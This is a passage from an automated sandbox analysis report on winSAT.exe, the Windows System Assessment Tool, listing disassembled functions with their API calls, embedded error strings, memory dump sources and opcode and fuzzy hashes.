                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ErrorFileStatus$ControlDeviceInitOpenStringUnicode
                                                                                                                                                                                              • String ID: $0$@$ERROR: Could not disable cache hits: %x$ERROR: Could not open control handle: %x$\Device\RdyBoost$base\winsat\exe\main.cpp
                                                                                                                                                                                              • API String ID: 1057317450-2235504267
                                                                                                                                                                                              • Opcode ID: 6a775b24524537a582d2429a4be7d5ab1ca4456a7b2a7e22435c35b6fea3d642
                                                                                                                                                                                              • Instruction ID: 64c22dab03971f70b69f8fc07da029d1f881b40ecaa5b8da4e99bc23aab307a5
                                                                                                                                                                                              • Opcode Fuzzy Hash: 6a775b24524537a582d2429a4be7d5ab1ca4456a7b2a7e22435c35b6fea3d642
                                                                                                                                                                                              • Instruction Fuzzy Hash: AE214A32B18B52DAF700AB60E8443B8B764FB88718FA08635DA4D46795DFBCE158C754
                                                                                                                                                                                              Function 00007FF780F9E514 Relevance: 16.6, APIs: 11, Instructions: 119memoryCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Local$Free$AllocCreateDescriptorKnownSecurityWell$DaclEntriesInitializememset
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 2625181342-0
                                                                                                                                                                                              • Opcode ID: 20c4f20feb80b6b69f46b80f1fca39230e041d6174e02534d753e8ff7984ab1e
                                                                                                                                                                                              • Instruction ID: d1046150643b39ecfe9ceaa4a4896a9180dd3b223e442408b798ec3cc3babf96
                                                                                                                                                                                              • Opcode Fuzzy Hash: 20c4f20feb80b6b69f46b80f1fca39230e041d6174e02534d753e8ff7984ab1e
                                                                                                                                                                                              • Instruction Fuzzy Hash: 9B517C36A14A418BE754DF61E8043BDBBB0FB49B99FA58139DE0943B88DF78E404CB50
                                                                                                                                                                                              Function 00007FF780FC90DC Relevance: 15.1, APIs: 10, Instructions: 103fileCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ErrorLast$CloseFile$FindHandle$CreateFirstRead
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 308217017-0
                                                                                                                                                                                              • Opcode ID: cec97ef7f6fd6b090083ccbde30f4d0df262ed20abc2832fa241464f729a5b25
                                                                                                                                                                                              • Instruction ID: 7ce7d5f37ecaddd435d4403b806046854b7076f2367a73fac544d53071ab5b3f
                                                                                                                                                                                              • Opcode Fuzzy Hash: cec97ef7f6fd6b090083ccbde30f4d0df262ed20abc2832fa241464f729a5b25
                                                                                                                                                                                              • Instruction Fuzzy Hash: 06414135A0CA42C6E750AB11E84537DBB60FB89BA4FA49630DA5E037D4CF7CE445CB50
                                                                                                                                                                                              Function 00007FF780F97B90 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 84windowCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ErrorExceptionFormatFreeHandleLastLocalMessageModuleThrowmemcpy
                                                                                                                                                                                              • String ID: ERROR: Can't load help text:
                                                                                                                                                                                              • API String ID: 1131719323-2132811999
                                                                                                                                                                                              • Opcode ID: 08dd0f6236ebd114b85014350d989b4c5b833746dd6e7120f43029f0b01a69db
                                                                                                                                                                                              • Instruction ID: 2d5f988df4e78d2d6610d7c258d60344b13089f42af588b9532782e4def2708d
                                                                                                                                                                                              • Opcode Fuzzy Hash: 08dd0f6236ebd114b85014350d989b4c5b833746dd6e7120f43029f0b01a69db
                                                                                                                                                                                              • Instruction Fuzzy Hash: 35316C32B0DB4286EB54AB55E4502BAF7A0FB85B90FE49235DA4E07794DF7CE005CB20
                                                                                                                                                                                              Function 00007FF78100B75C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 90sleepCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: __uncaught_exception$CountTick$FreeHandleLibraryModuleSleep
                                                                                                                                                                                              • String ID: D3DCommon::DX9Shutdown
                                                                                                                                                                                              • API String ID: 3610941158-2577756890
                                                                                                                                                                                              • Opcode ID: cd8845a20336be1aa6f0397a75ad1ef2358986b1d34ab775adc933cd83eb90d0
                                                                                                                                                                                              • Instruction ID: e6b48d547cf746d6abcafe54e9b53cae1480dd006477cfcfc0a8b299e2850b5e
                                                                                                                                                                                              • Opcode Fuzzy Hash: cd8845a20336be1aa6f0397a75ad1ef2358986b1d34ab775adc933cd83eb90d0
                                                                                                                                                                                              • Instruction Fuzzy Hash: 2F415C35E09A0286EB51BB15EC40179B7A0FF85B60FA44636DA5E433A4CFBCE951CB60
                                                                                                                                                                                              Function 00007FF780FD73DC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69memoryCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • AllocateAndInitializeSid.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF780F9EDEA), ref: 00007FF780FD7449
                                                                                                                                                                                              • CheckTokenMembership.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF780F9EDEA), ref: 00007FF780FD7463
                                                                                                                                                                                              • FreeSid.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF780F9EDEA), ref: 00007FF780FD7475
                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF780F9EDEA), ref: 00007FF780FD7485
                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF780F9EDEA), ref: 00007FF780FD74A4
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ErrorLast$AllocateCheckFreeInitializeMembershipToken
                                                                                                                                                                                              • String ID: base\winsat\common\winsatutilities.cpp
                                                                                                                                                                                              • API String ID: 1125035699-683828118
                                                                                                                                                                                              • Opcode ID: 16f08f34a3520767a4bce9a053d86719e266f8ecd70336167b11855c30fb4abd
                                                                                                                                                                                              • Instruction ID: 6b8c7c7c3d35a26430bc0128f77a6d68bc35977459c9812d1bc6c3ea7bd0158d
                                                                                                                                                                                              • Opcode Fuzzy Hash: 16f08f34a3520767a4bce9a053d86719e266f8ecd70336167b11855c30fb4abd
                                                                                                                                                                                              • Instruction Fuzzy Hash: B9316772A28B51CAE7109F60E8441ADBBB8F74DB54FA18136DE4D43B48DF38D545CB60
                                                                                                                                                                                              Function 00007FF780FE5EF0 Relevance: 7.6, APIs: 5, Instructions: 86COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ErrorInformationLastLogicalProcessor$InfoSystemmalloc
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 4232983313-0
                                                                                                                                                                                              • Opcode ID: de47acfba31066c2271faddbbf81517749ac207c03630c107d70b6b34f402b11
                                                                                                                                                                                              • Instruction ID: 70383a5eace23907f25e3da917148e92730d56dc6d705557576885905ad7e14e
                                                                                                                                                                                              • Opcode Fuzzy Hash: de47acfba31066c2271faddbbf81517749ac207c03630c107d70b6b34f402b11
                                                                                                                                                                                              • Instruction Fuzzy Hash: C0319A76A18786C6D724DF25E84056CFBA0FB89F80FA48135DA4E87B94DF38E844CB10
                                                                                                                                                                                              Function 00007FF780FA53B8 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 313COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ExceptionThrowstd::bad_exception::bad_exception
                                                                                                                                                                                              • String ID: vector<T> too long
                                                                                                                                                                                              • API String ID: 1480402491-3788999226
                                                                                                                                                                                              • Opcode ID: c3b03abaeba473964202ef80826ee842c0101518cb27dd78b59084bfd433504a
                                                                                                                                                                                              • Instruction ID: 850c62a0766ff48de4f253af43912c4936f0aa01730ef715f56c18dfd92ae57c
                                                                                                                                                                                              • Opcode Fuzzy Hash: c3b03abaeba473964202ef80826ee842c0101518cb27dd78b59084bfd433504a
                                                                                                                                                                                              • Instruction Fuzzy Hash: 2CB1F4A2B0978A82DE24EB16E4001AAE3A2FB54BD4FA49132DE9D077D5DF3CF551C310
                                                                                                                                                                                              Function 00007FF7810A5AA4 Relevance: 4.5, APIs: 3, Instructions: 13COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ExceptionFilterUnhandled$CurrentProcess
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1249254920-0
                                                                                                                                                                                              • Opcode ID: e4b332a47f02e1f7e2d5769a93b7caf1f0983b9bd8db4581ebd599304e0087a0
                                                                                                                                                                                              • Instruction ID: 7a21d2c1f57428257f41f4b880d9ba73770b67ab66b4d6c6ae1525f3584f646e
                                                                                                                                                                                              • Opcode Fuzzy Hash: e4b332a47f02e1f7e2d5769a93b7caf1f0983b9bd8db4581ebd599304e0087a0
                                                                                                                                                                                              • Instruction Fuzzy Hash: FBD0C769E1970A86F75C37A16C551755250BF5CB61F745034C90F45364DD7C948ACB10
                                                                                                                                                                                              Function 00007FF780FD4D04 Relevance: 3.0, APIs: 2, Instructions: 8sleepCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • Sleep.KERNEL32(?,?,?,?,00007FF780FD56A9,?,?,?,?,?,?,00007FF780F999D0), ref: 00007FF780FD4D14
                                                                                                                                                                                                • Part of subcall function 00007FF780FCE2F8: EnterCriticalSection.KERNEL32(?,?,?,?,00007FF780FD4D25,?,?,?,?,00007FF780FD56A9), ref: 00007FF780FCE362
                                                                                                                                                                                                • Part of subcall function 00007FF780FCE2F8: CloseHandle.KERNEL32(?,?,?,?,00007FF780FD4D25,?,?,?,?,00007FF780FD56A9), ref: 00007FF780FCE37B
                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 00007FF780FD4D2A
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CloseCriticalEnterExitHandleProcessSectionSleep
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 915451738-0
                                                                                                                                                                                              • Opcode ID: b06ac2e7ad7a353e789c00a753087b3fa283f5700c4f20c242a7d645a3ea8a48
                                                                                                                                                                                              • Instruction ID: 1eabb0eb2e3bbc2101c6539b7b05056bb0a9dc5ec5e14e677b22bb3096c025f0
                                                                                                                                                                                              • Opcode Fuzzy Hash: b06ac2e7ad7a353e789c00a753087b3fa283f5700c4f20c242a7d645a3ea8a48
                                                                                                                                                                                              • Instruction Fuzzy Hash: F9D0C924908591C7F3447B50EC053BDAA50FB46712FF04174C10E05292CFAD2484CB61
                                                                                                                                                                                              Function 00007FF780F932BC Relevance: 2.5, APIs: 2, Instructions: 19memoryCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Heap$FreeProcess
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3859560861-0
                                                                                                                                                                                              • Opcode ID: 8751c996d58478eeb4ffddafcc8ef92cb41152bbaf4b3f5c930e3de30d5ebeca
                                                                                                                                                                                              • Instruction ID: 7738cd25e380d305e20c2cf4b62b0e1a7b03a846002f54ec831d01d5c093dd06
                                                                                                                                                                                              • Opcode Fuzzy Hash: 8751c996d58478eeb4ffddafcc8ef92cb41152bbaf4b3f5c930e3de30d5ebeca
                                                                                                                                                                                              • Instruction Fuzzy Hash: E7E09A26A04A8186E7049B56F504379FA60FB8EFD0F68D120CE0A06708CE38C484CB00
                                                                                                                                                                                              Function 00007FF78101A42C Relevance: 1.5, APIs: 1, Instructions: 33filenativeCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ControlDeviceFile
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3512290074-0
                                                                                                                                                                                              • Opcode ID: ec03c51d71c64ebe428cc224d4e0dc846d9f001cf038a09347dc456f5621201c
                                                                                                                                                                                              • Instruction ID: fffa8c2463f0c065360fcfe42c808fe14a128696a6cb5c65556afc95650d9d03
                                                                                                                                                                                              • Opcode Fuzzy Hash: ec03c51d71c64ebe428cc224d4e0dc846d9f001cf038a09347dc456f5621201c
                                                                                                                                                                                              • Instruction Fuzzy Hash: A1014837B28B4086E710DB29F44531DBBE1BB89750FA15138EAAD83760DF3AC455CB10
                                                                                                                                                                                              Function 00007FF7810A63C0 Relevance: .0, Instructions: 12COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: d0d42c82d2ef74cfdc025912d9d5c21e86d1b494dd9525300916cab29790b24a
                                                                                                                                                                                              • Instruction ID: 3c0f602b7809bd175f35322584f5ce46aa1a84017e3bc04df4ac48a556ff3692
                                                                                                                                                                                              • Opcode Fuzzy Hash: d0d42c82d2ef74cfdc025912d9d5c21e86d1b494dd9525300916cab29790b24a
                                                                                                                                                                                              • Instruction Fuzzy Hash: DEC002F3A093808F8789CF6EA8504587BE5B788711B54C13EA619D3310E3318140CF12
                                                                                                                                                                                              Function 00007FF780F9EE5E Relevance: 86.1, APIs: 45, Strings: 4, Instructions: 345synchronizationCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ExceptionThrow$Resource$CloseLibrary$EnabledEventFreeHandleLoadOpenValue__uncaught_exception$ConsoleCountCtrlCurrentDirectoryErrorFindFormatHandlerLastLockMessageModuleMutexProcessQueryReleaseRemoveSizeofStringTickTypeUninitialize_snprintf_s_vsnprintf_s
                                                                                                                                                                                              • String ID: > exit value = %d.$Cleanup and exit$ERROR: Cannot ensure winsat directory exists: %s$PrivateError2
                                                                                                                                                                                              • API String ID: 3527692918-605043853
                                                                                                                                                                                              • Opcode ID: 147a0eac15cc5e19155f422876c49af70a37c59056e338aec2df5a2bfa3592e8
                                                                                                                                                                                              • Instruction ID: 335a6ff2398881933979bfff5cea43723f95b14ae9db94b22da52f3ecf5d5eb4
                                                                                                                                                                                              • Opcode Fuzzy Hash: 147a0eac15cc5e19155f422876c49af70a37c59056e338aec2df5a2bfa3592e8
                                                                                                                                                                                              • Instruction Fuzzy Hash: 851242A2E0D68795EB20FB15F8502F9B761FF81344FF09035D68E466A9DEACE544CB20
                                                                                                                                                                                              Function 00007FF780F9EC83 Relevance: 86.1, APIs: 46, Strings: 3, Instructions: 338synchronizationCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ExceptionThrow$Resource$Close$HandleOpenValue__uncaught_exception$ConsoleCtrlDirectoryErrorFindFreeHandlerLastLibraryLoadLockModuleMutexQueryReleaseRemoveSizeofStringTypeUninitialize
                                                                                                                                                                                              • String ID: > exit value = %d.$Cleanup and exit$PrivateError2
                                                                                                                                                                                              • API String ID: 2704613218-3112339584
                                                                                                                                                                                              • Opcode ID: 4c83e0f4d37b8bc4f47f6d1a201d832acce18081443d4dde09c58400e7096c1c
                                                                                                                                                                                              • Instruction ID: 68dbcf9c243ff999810a8685e4b26bc8265320f8faa219d587193d385310cc23
                                                                                                                                                                                              • Opcode Fuzzy Hash: 4c83e0f4d37b8bc4f47f6d1a201d832acce18081443d4dde09c58400e7096c1c
                                                                                                                                                                                              • Instruction Fuzzy Hash: C40241A2D0D68795EB20FB15F8502F9B761FF91344FF09035C68E466A9EEACE544CB20
                                                                                                                                                                                              Function 00007FF780F9EF5B Relevance: 80.8, APIs: 42, Strings: 4, Instructions: 323synchronizationCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
